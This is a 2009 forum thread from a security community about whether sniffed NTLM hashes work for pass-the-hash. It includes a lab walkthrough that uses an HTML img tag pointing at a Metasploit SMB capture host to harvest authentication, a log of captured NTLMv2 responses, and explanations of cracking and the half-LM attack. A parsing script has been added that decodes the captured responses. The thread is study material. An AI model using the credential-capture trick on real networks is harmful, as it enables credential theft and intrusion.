
Pass-the-hash question

d3l0n

Jr. Member

Posts: 59

Joined: Sat Dec 27, 2008 6:48 pm

Post Thu Nov 12, 2009 9:46 pm

Pass-the-hash question

Is it possible to use a hash sniffed from a connection between a Windows XP station and a Windows 2003 domain controller in the pass-the-hash technique?

Or is it possible only if one used a tool like the pass-the-hash toolkit on the Windows XP station, or had it authenticate to a station that is running the Metasploit smb module?

Thanks
venom77

Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Fri Nov 13, 2009 6:38 am

Re: Pass-the-hash question

As long as you have a utility that will pass the hash, I'm pretty sure you can use the proper hash no matter where you got it from.
d3l0n

Jr. Member

Posts: 59

Joined: Sat Dec 27, 2008 6:48 pm

Post Fri Nov 13, 2009 5:24 pm

Re: Pass-the-hash question

Thank you BillV.

I tried the sniffed hash with Metasploit and smbshell, but it did not work. So I'm guessing it works only with the pass-the-hash toolkit; I have to try it with this tool, though, before I conclude.

Here is my environment, if that helps.

I have one domain (named DC), one workstation connected to the domain (named W1), and one workstation that is in a workgroup (s1). I also have an Ubuntu machine running Metasploit 3.3rc1 and Nessus 4.

I have Cain & Abel installed on s1 and use it to sniff connections between DC and W1, and also between W1 and s1. The hashes I sniffed I used in Metasploit and smbshell, as mentioned before, but with no luck.

I tried running the smb module in Metasploit and had s1 connect to it via a URL link with the image source set to \\ubuntu\image\trick.gif. But I did not capture anything when I opened the HTML page from s1.

Any idea? Did I do anything wrong?

Thanks in advance for the help.
d3l0n

Jr. Member

Posts: 59

Joined: Sat Dec 27, 2008 6:48 pm

Post Fri Nov 13, 2009 5:54 pm

Re: Pass-the-hash question

This is the capture I gathered using the smb module from s1:
  Code:
msf auxiliary(smb) > run
[*] Auxiliary module execution completed

[*] Server started.
msf auxiliary(smb) > [*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:e4c33d3f1f2ef7952138d27242654f7a010100000000000029a52bd3b164ca013e2d8eb406b3f0d400000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:3a453950d098e9b59f88eaa5628bee520101000000000000f9ea2fd3b164ca0112a09ea79a0a637900000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:95782ca14bd78a4c70be953811709d71010100000000000098bb33d3b164ca01ae0245df301f235500000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:8ea08aa689958a547540711096d14aee0101000000000000680138d3b164ca0190afd31a5d8b575a00000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:aec3bb6e5d2f6f12bd83c0ef46a9e139010100000000000069bc3cd3b164ca015948d33cd527cce100000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:1ded841a3d184703ef5b115de99d8b3001010000000000004a2941d3b164ca0153d0e59769fe94de00000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:e8b28d52e979c73f8ef6e8d6dd00ec120101000000000000094845d3b164ca016abaf5dd251d583700000000020000000000000000000000 OS: LM:

You can see that for the same session (loading one page once) I gathered multiple NTLM hash values. And these values need "some processing" before getting the real NTLM hash.
timmedin

Sr. Member

Posts: 469

Joined: Thu Feb 05, 2009 11:18 pm

Post Sun Nov 15, 2009 12:18 pm

Re: Pass-the-hash question

I believe you are talking about three different scenarios, and each works differently.

1. Sniffing - When sniffing the authentication between two machines there is a "challenge" value used. If you don't know this value you won't be able to use the hash.

2. MSF SMB - This uses a static challenge on the client (the Metasploit box) so the hash can be retrieved. MSF handles this for you and you can use these hashes in the pass-the-hash attack.

3. Dump - These hashes can be used for pass-the-hash.

So that explains why your sniffing didn't work.

I don't know why your \\ubuntu\blah\blah didn't work. If you "ping ubuntu" from the other machine does it work? My assumption is that it can't resolve "ubuntu" and fails before it even tries to connect.
twitter.com/timmedin | http://blog.securitywhole.com
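Added example, not code from this thread or from Metasploit: a small Python parser that takes two of the NTHASH values from d3l0n's capture above and splits them into the MS-NLMP NTLMv2_RESPONSE fields, showing why they are per-request challenge-responses (a fresh client challenge and timestamp each time) rather than the 16-byte NT hash a pass-the-hash tool expects. Treating the "victim" token as the account name is an assumption.

```python
import re
import struct
from datetime import datetime, timedelta, timezone

# Two lines copied from the msf smb capture posted earlier in this thread (same client, one page load).
CAPTURE = """\
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:e4c33d3f1f2ef7952138d27242654f7a010100000000000029a52bd3b164ca013e2d8eb406b3f0d400000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:3a453950d098e9b59f88eaa5628bee520101000000000000f9ea2fd3b164ca0112a09ea79a0a637900000000020000000000000000000000 OS: LM:
"""
# Assumption: the token after the client address ("victim") is the account name msf saw.
LINE_RE = re.compile(r"Captured (\S+) (\S+) LMHASH:([0-9a-fA-F]+) NTHASH:([0-9a-fA-F]+)")
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def parse_capture(text):
    """One dict per 'Captured' line: client, user, LM response and NT response as hex."""
    return [dict(zip(("client", "user", "lm", "nt"), m.groups()))
            for m in LINE_RE.finditer(text)]


def parse_ntlmv2_response(nt_hex):
    """Split an NTLMv2_RESPONSE (MS-NLMP 2.2.2.8) into its fields.

    NTProofStr(16) | RespType(1) HiRespType(1) Reserved(6) | TimeStamp(8, FILETIME LE)
    | ChallengeFromClient(8) | Reserved(4) | AvPairs (here one empty pair plus terminator).
    NTProofStr is HMAC-MD5 over server challenge + blob, keyed by a value derived from the
    NT hash, so it differs per request and does not contain the NT hash itself.
    """
    raw = bytes.fromhex(nt_hex)
    if len(raw) < 44 or raw[16] != 0x01:
        raise ValueError("not an NTLMv2 response")
    proof, blob = raw[:16], raw[16:]
    (filetime,) = struct.unpack("<Q", blob[8:16])
    return {"nt_proof": proof.hex(),
            "resp_type": blob[0],
            "timestamp": FILETIME_EPOCH + timedelta(microseconds=filetime // 10),
            "client_challenge": blob[16:24].hex(),
            "av_pairs": blob[28:].hex()}


def is_bare_nt_hash(hex_value):
    """True only for a 16-byte NT hash (32 hex chars), the input pass-the-hash tools take."""
    return re.fullmatch(r"[0-9a-fA-F]{32}", hex_value) is not None


def check_capture(text):
    """For each captured line: (client, is it a bare NT hash?, client challenge of this request)."""
    return [(r["client"], is_bare_nt_hash(r["nt"]), parse_ntlmv2_response(r["nt"])["client_challenge"])
            for r in parse_capture(text)]
```

Running check_capture(CAPTURE) shows both lines are NTLMv2 responses with different client challenges, so neither is a reusable hash; the timestamp field decodes to the day the capture was posted.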
d3l0n

Jr. Member

Posts: 59

Joined: Sat Dec 27, 2008 6:48 pm

Post Mon Nov 16, 2009 1:38 pm

Re: Pass-the-hash question

Thanks so much timmedin for the detailed explanation.

In my previous post, I posted a capture I gathered from the msf smb module. What I did to the HTML page to make it work is change the img URL to this: <img src="file://ubuntu/blah/blah.img">

But as you can see from the capture, LM is not used at all. The NTLM hash is much longer than usual. I'm not sure if there are further tweaks that need to be done to the hash to make it usable, or if it can't be used at all.

Any idea?

thx
d3l0n

Jr. Member

Posts: 59

Joined: Sat Dec 27, 2008 6:48 pm

Post Tue Nov 24, 2009 2:40 am

Re: Pass-the-hash question

  Quote:
1. Sniffing - When sniffing the authentication between two machines there is a "challenge" value used. If you don't know this value you won't be able to use the hash.

How hard/easy is it for an attacker to guess/crack the challenge? What if both the workstation and the server only support NTLM, or only NTLMv2?

Thanks
timmedin

Sr. Member

Posts: 469

Joined: Thu Feb 05, 2009 11:18 pm

Post Sun Nov 29, 2009 12:27 am

Re: Pass-the-hash question

Did you try using Cain & Abel or Opht to crack it? Since you have the password hash that is "encrypted" with the challenge, you can't use it in a pass-the-hash attack. You need just the password hash to use it in the pass-the-hash attack.
twitter.com/timmedin | http://blog.securitywhole.com
timmedin

Sr. Member

Posts: 469

Joined: Thu Feb 05, 2009 11:18 pm

Post Sun Nov 29, 2009 12:29 am

Re: Pass-the-hash question

Here is the blog post from metasploit.com on the subject.
http://blog.metasploit.com/2008/11/ms08 ... relay.html
twitter.com/timmedin | http://blog.securitywhole.com
d3l0n

Jr. Member

Posts: 59

Joined: Sat Dec 27, 2008 6:48 pm

Post Mon Nov 30, 2009 1:03 am

Re: Pass-the-hash question

Thanks much timmedin. Incidentally, I was reading the post you kindly provided a link to.

This is my understanding of the subject. Cracking a sniffed challenge-response hash to get the password hash is not an easy task (time-wise) when the challenge key is not known. If the challenge key is known, the process will be much easier. This is, however, if an LM/NTLM challenge-response is sniffed; if NTLMv2 is sniffed, it will be extremely hard to do.

Thanks a lot timmedin for all your help in this post.
Last edited by d3l0n on Mon Nov 30, 2009 1:05 am, edited 1 time in total.
apollo

Full Member

Posts: 146

Joined: Fri Apr 04, 2008 7:44 pm

Post Mon Nov 30, 2009 1:18 am

Re: Pass-the-hash question

If you get bored, I have some stuff on capturing challenge hashes and having fun with them in my presentation at http://www.sector.ca/presentations.htm. Basically, if you have a static challenge for NTLMv1 auth, then you haven't really increased the complexity of cracking the password by very much. The reason for this is that for NTLMv1 only the server sets a challenge. In NTLMv2 both the client and the server set a challenge, and so it makes it almost impossible to use any sort of time-tradeoff method such as rainbow tables to crack the password. You are left with brute force. The two challenges don't increase the complexity significantly over having a single random challenge, but it does mean that having control over one of the challenges will not help you much.

Turning off LM also increases the complexity of cracking NTLMv1 challenge/response, as you are left having to crack a whole hash; with the LM portion of NTLMv1 you can instead perform an attack known as a half-LM challenge attack, which will get you the first 8 characters of the password a lot faster and then allow you to only brute force the last X characters of the password. If the password is < 11 characters, the time isn't significant. Passwords over 11 characters still require a fair amount of time, and it goes up exponentially as you add characters.

Anyway, hope this helps some.
-Ryan
CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+
d3l0n

Jr. Member

Posts: 59

Joined: Sat Dec 27, 2008 6:48 pm

Post Wed Dec 02, 2009 1:34 pm

Re: Pass-the-hash question

Very informative Ryan, thank you so much!
